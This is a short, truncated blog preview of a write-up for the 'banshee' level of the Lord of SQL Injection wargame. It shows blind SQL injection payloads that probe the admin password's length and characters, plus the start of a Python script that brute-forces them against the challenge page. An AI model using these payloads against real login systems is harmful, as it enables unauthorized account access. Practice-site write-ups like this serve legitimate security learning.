Wargame/Lord of SQL Injection
[Lord of SQL Injection] banshee
Prob Payload pw=' or id='admin' and length(pw)=8--%20 pw=' or id='admin' and unicode(substr(pw,1,1))=48--%20 Exploit import requests import string url = "https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=' or id='admin' and length(pw)={}-- ".format(pw_len) ..
2022. 10. 25.